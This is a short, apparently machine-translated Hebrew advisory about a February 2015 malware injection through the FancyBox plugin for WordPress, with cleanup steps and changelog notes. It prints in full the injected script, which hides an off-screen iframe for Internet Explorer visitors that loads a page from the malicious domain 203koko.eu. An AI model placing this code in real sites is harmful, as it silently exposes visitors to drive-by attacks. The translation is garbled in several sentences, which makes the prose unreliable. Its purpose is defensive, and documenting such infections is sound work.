מוקדם יותר השבוע מספר אתרים ובלוגים WordPress, קיבל אזהרות מאת זיהום תוכנות זדוניות דרך מנהלי אתרים Google.
הבעיה של מנהלי אתרים Google מכונה היא נוכחותם של בקלה / תסריט תוכנות זדוניות של iframe אתרי המקור.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
נראה שזה פגיעות a חיבורacquis FancyBox עבור WordPress שעד אתמול (05.02.2015) לא עודכן במשך זמן רב.
פתרון בעיה זו ו חיטוי אתרי וירוסים עם תוכנה זדונית זו, היא פשוטה יחסית.
1. השבת את תוסף FancyBox.
2. מחק את כל הקבצים FancyBox plugin מהשרת (באמצעות FTP)
3. התקן את הגרסה החדשה של התוסף (Fancybox 3.0.4)
FancyBox עבור WordPress 3.0.4
- שונה שם ההגדרה המושפעת מבעיית האבטחה המוזכרת ב-3.0.3. זה אמור למנוע מהקוד הזדוני להופיע באתרים שבהם נמצא הפלאגין updated מבלי להסיר את הקוד הזדוני.
FancyBox עבור WordPress 3.0.3
- קבוע בעיית אבטחה.
מידע על תוכנות זדוניות:
סוג: ניתוב מחדש של Iframe
TARGET: WordPress פנסיבוקס
DOMAIN תוכנות זדוני: 203koko.eu
תוכנה זדונית URI: http://203koko.eu/hjnfh/ipframe2.php
תוכנות זדוניות RAW קודים:
תוכנות Malware שנכתבו: if (navigator.userAgent.match(/msie/i)) { document.write(‘
הסר תוכנות זדוניות מהמכשיר שלך WordPress אתר אינטרנט.